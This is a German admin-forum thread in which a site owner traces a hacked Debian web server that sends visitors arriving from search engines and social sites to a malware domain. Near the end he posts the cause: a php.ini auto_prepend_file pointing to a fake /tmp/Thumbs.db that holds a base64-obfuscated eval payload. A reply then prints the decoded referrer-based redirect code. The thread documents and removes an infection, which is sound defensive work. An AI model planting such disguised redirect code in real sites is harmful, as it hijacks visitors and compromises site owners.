10
Gesamter Traffic von extern auf finditnow.osa.pl weitergeleitet - wurm- wie entfernen?
Durch einen Hack in einer Lücke bei Wordpress bin ich Opfer von einem hack geworden.
Ich habe schon einiges probiert bekomme ihn aber leider nicht komplett entfernt und hoffe das man mir hier helfen kann.
Liebe User,
ich bin "Opfer" eines Hackangriffes geworden.
Ich bin selbst Schuld, denn ich hatte ein veraltetes Wordpress auf meinem Server, über den dieser Hack eingeschleust wurde.
http://www.faires-marketing.de/finditnow-osa-pl-hack-unerwunschte-umlei ...
Habe viele Seiten und Foren durchgeforscht, aber mein Problm wurde dadurch leider nicht behoben.
Ein Beispiel:
Geht auf http://www.google.de - gibt dort "lolrofl" ein - lolrofl.net ist meine Seite. klickt ihr den Link nun über google an, kommt ihr auf http://finditnow.osa.pl/atp/?said=3333g&q=lolrofl - und das ist bei all meinen Webseiten so. Auch wenn ein klick über Facebook, Gmail o.ä. kommt auf meine Seiten, wird er auf diese Seite weitergeleitet. (Auch bei Seiten ohne Wordpress)
Ich habe schon alles unternommen, was auf den Webseiten gesagt wird.
Es gibt bei mir keine Dateien mehr, die diesen "Schadcode" in sich haben, die auf finditnow.osa.pl weiterleiten.
Ich habe testweise Dateien erstellt, ohne Inhalt, und habe diese dann über Google und Facebook aufgerufen, und das gleiche Spiel, ich werde auf die Malware Seite weiter geleitet. Obwohl nichts in der Datei drin steht. Auch ist in dem Ordner der Webseite keine .htaccess File.
Ich weiß einfach nicht mehr wo ich suchen soll und woran es liegen kann das es immer noch bei allen Seiten mit .php so ist.
Habt ihr noch eine Idee, wo sich dieser Wurm vergraben hat das ich ihn nicht finde oder was ich machen kann?
Ich danke euch schonmal, ich sitze schon seit Samstag dran und ich habe auch schon eine Firma beauftragt, aber selbst die tapt weiterhin im dunkeln.
Dankeschonmal!
Liebe Grüße,
Benni
ich bin "Opfer" eines Hackangriffes geworden.
Ich bin selbst Schuld, denn ich hatte ein veraltetes Wordpress auf meinem Server, über den dieser Hack eingeschleust wurde.
http://www.faires-marketing.de/finditnow-osa-pl-hack-unerwunschte-umlei ...
Habe viele Seiten und Foren durchgeforscht, aber mein Problm wurde dadurch leider nicht behoben.
Ein Beispiel:
Geht auf http://www.google.de - gibt dort "lolrofl" ein - lolrofl.net ist meine Seite. klickt ihr den Link nun über google an, kommt ihr auf http://finditnow.osa.pl/atp/?said=3333g&q=lolrofl - und das ist bei all meinen Webseiten so. Auch wenn ein klick über Facebook, Gmail o.ä. kommt auf meine Seiten, wird er auf diese Seite weitergeleitet. (Auch bei Seiten ohne Wordpress)
Ich habe schon alles unternommen, was auf den Webseiten gesagt wird.
Es gibt bei mir keine Dateien mehr, die diesen "Schadcode" in sich haben, die auf finditnow.osa.pl weiterleiten.
Ich habe testweise Dateien erstellt, ohne Inhalt, und habe diese dann über Google und Facebook aufgerufen, und das gleiche Spiel, ich werde auf die Malware Seite weiter geleitet. Obwohl nichts in der Datei drin steht. Auch ist in dem Ordner der Webseite keine .htaccess File.
Ich weiß einfach nicht mehr wo ich suchen soll und woran es liegen kann das es immer noch bei allen Seiten mit .php so ist.
Habt ihr noch eine Idee, wo sich dieser Wurm vergraben hat das ich ihn nicht finde oder was ich machen kann?
Ich danke euch schonmal, ich sitze schon seit Samstag dran und ich habe auch schon eine Firma beauftragt, aber selbst die tapt weiterhin im dunkeln.
Dankeschonmal!
Liebe Grüße,
Benni
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 167197
Url: https://administrator.de/contentid/167197
Printed on: April 23, 2024 at 22:04 o'clock
10 Comments
Latest comment
"Liebe User vom Debianforum.de,"?
Glaube du bist erst mal im falschen Forum!
Glaube du bist erst mal im falschen Forum!
Verschrieben! Sorry
Ehrliche Antwort?
Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.
Ganz ehrlich,
Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.
Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:
Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.
Mfg.
Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.
Ganz ehrlich,
Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.
Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:
Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.
Mfg.
Zitat von @Phalanx82:
Ehrliche Antwort?
Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.
Ganz ehrlich,
Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.
Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:
Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.
Mfg.
Ehrliche Antwort?
Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.
Ganz ehrlich,
Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.
Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:
Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.
Mfg.
Danke für die Antwort, aber es handelt sich um einen Debian Webserver
Und wenn du es noch etwas sicherer haben willst, dann könntest du die Platte sogar mit einem Tool wie dban komplett mit Nullen (oder Einsen) überschreiben.
Oder du nimmst gleich eine neue Platte, dann ist es sicher, dass sich kein Kein Schädling in einem verstecken Bereich breitgemacht hat.
Oder du nimmst gleich eine neue Platte, dann ist es sicher, dass sich kein Kein Schädling in einem verstecken Bereich breitgemacht hat.
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?
Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP plattmachen und inklusive Plugins neu installieren und konfigurieren.
Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP plattmachen und inklusive Plugins neu installieren und konfigurieren.
Zitat von @m3adow:
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?
Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP
plattmachen und inklusive Plugins neu installieren und konfigurieren.
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?
Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP
plattmachen und inklusive Plugins neu installieren und konfigurieren.
Nicht nur Wordpress Dateien. Alle .php Dateien tun dies, wenn über einen Ref diese PHP File geöffnet wird
Danke für die Antwort, aber es handelt sich um einen Debian Webserver
Die Aussagen gelten für debian genauso wie für Windows, BSD, Solaris, DOS, ...
gefunden!
]; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =/tmp/Thumbs.db
cat /tmp/Thumbs.db
<?php @eval(base64_decode("DQoNCmVycm9yX3JlcG9ydGluZygwKTsNCiRuY2N2PWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkbmNjdil7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQoNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJhb2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0d2l0dGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHVkd2lnLmJlZS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?>
]; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =/tmp/Thumbs.db
cat /tmp/Thumbs.db
<?php @eval(base64_decode("DQoNCmVycm9yX3JlcG9ydGluZygwKTsNCiRuY2N2PWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkbmNjdil7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQoNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJhb2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0d2l0dGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHVkd2lnLmJlZS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?>
Na das sieht mir doch schonmal verdächtig aus.
Hier mal der Inhalt der Base64 Codierung:
Das sieht mir eindeutig nach Schädlingsbefall aus.
Mfg.
Hier mal der Inhalt der Base64 Codierung:
zö¥m«
ë‡^r‡^
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
if (stristr($referer,"aol") or stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://ludwig.bee.pl/");
exit();
}
}
}Das sieht mir eindeutig nach Schädlingsbefall aus.
Mfg.
